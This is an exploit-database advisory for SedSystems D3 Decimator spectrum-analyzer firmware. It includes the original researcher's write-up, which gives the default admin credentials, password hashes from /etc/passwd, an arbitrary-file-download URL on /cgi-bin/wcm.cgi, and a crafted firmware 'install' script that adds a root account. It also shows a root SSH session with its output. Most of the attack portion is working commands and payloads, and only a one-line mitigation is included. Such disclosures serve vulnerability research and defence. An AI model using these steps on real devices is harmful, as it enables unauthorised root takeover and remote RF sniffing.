SedSystems D3 Decimator Multiple Vulnerabilities

vendor:

D3 Decimator

by:

Unknown

8,8

CVSS

HIGH

Hardcoded Credentials, Arbitrary File Download, Arbitrary Code Execution

798

CWE

Product Name: D3 Decimator

Affected Version From: 3.0.12-1

Affected Version To: 3.1

Patch Exists: YES

Related CWE: N/A

CPE: o:sedsystems:d3_decimator

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

SedSystems D3 Decimator Multiple Vulnerabilities

SedSystems D3 Decimator devices have multiple vulnerabilities, including hardcoded credentials, arbitrary file download, and arbitrary code execution. The hardcoded credentials can be found in the /etc/passwd files contained within the default firmware since at least February 2013. The admin user has a default password of "admin", and the root user password is unknown. The arbitrary file download vulnerability can be exploited by sending a crafted request to the /cgi-bin/wcm.cgi endpoint, which will allow the attacker to download any file on the device. The arbitrary code execution vulnerability can be exploited by uploading a crafted tarball that contains a "install" script in its root, which will be executed as root when the device attempts to flash the firmware.

Mitigation:

Users should ensure that they are running the latest version of the firmware, and should ensure that the default credentials are changed.

Source

Exploit-DB raw data:

SedSystems D3 Decimator Multiple Vulnerabilities
================================================
Identification of the vulnerable device can be performed by scanning for 
TCP port 9784 which offers a default remote API. When connected to this 
device it will announce itself with "connected" or similar:

Connected to x.x.x.x.
Escape character is '^]'.
connected
status
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
ping
ping:ok

The web service by default has a user interface for accessing the RF 
spectrum analyzer capability. The device itself from the API can give 
raw remote access to I/Q samples so can be used to remotely sniff the 
RF spectrum. The Web Configuration Manager can be found on 
"/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.

Hardcoded credentials can be found in the /etc/passwd files contained 
within the default firmware since at least February 2013. The following 
entries can be found:

root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly

The admin user has a default password of "admin", at this time the root 
user password is unknown however there is no documented way of changing 
this trivially in a device. Using the "admin" user you can obtain a web 
session to the wcm.cgi and exploit a hidden arbitary file download 
vulnerability discovered by reverse engineering the firmware:

http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd

This will allow you to download any file and as the "admin" user has root
privileges you can obtain access to any file on the device. To execute 
arbitary code you can make use of a vulnerbaility within the firmware 
flash routines. By uploading a crafted tarball that contains a "install" 
script in its root, the device will accept your firmware and then attempt
to execute ./install if found as root, you can then cancel the "flash" 
process to prevent bricking/modifcation of the device. The problem is due
to /usr/bin/install_flash which after using "tar" to unpack an archive 
to a tmp folder of /tmp/PID_of_tar does the following:

    80  # If the archive contained its own install script then use that
    81  
    82  if [ -x ./install ]; then
    83      ./install $all_args
    84      rc=$?
    85      exit $rc
    86  fi
    87  

Using this vulnerability you can upload a .tar file containing an install
file that looks like the following to obtain a root user account with 
adm1n/admin.

cat install 
#!/bin/sh
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd

You can then SSH remotely to the device as PermitRootLogin is enabled 
by default.

E.g.

$ ssh  -l adm1n x.x.x.x
adm1n@x.x.x.x's password: admin 
# uname -a
Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
# cat /proc/cpuinfo
Processor	: ARM926EJ-S rev 4 (v5l)
BogoMIPS	: 103.83
Features	: swp half thumb fastmult vfp edsp java 
CPU implementer	: 0x41
CPU architecture: 5TEJ
CPU variant	: 0x0
CPU part	: 0x926
CPU revision	: 4

Hardware	: SED 32XX Based CCA
Revision	: 0000
Serial		: 0000000000000000
# 

Vendor website can be found at the following url:
* http://www.sedsystems.ca/decimator_spectrum_analyzer

 -- prdelka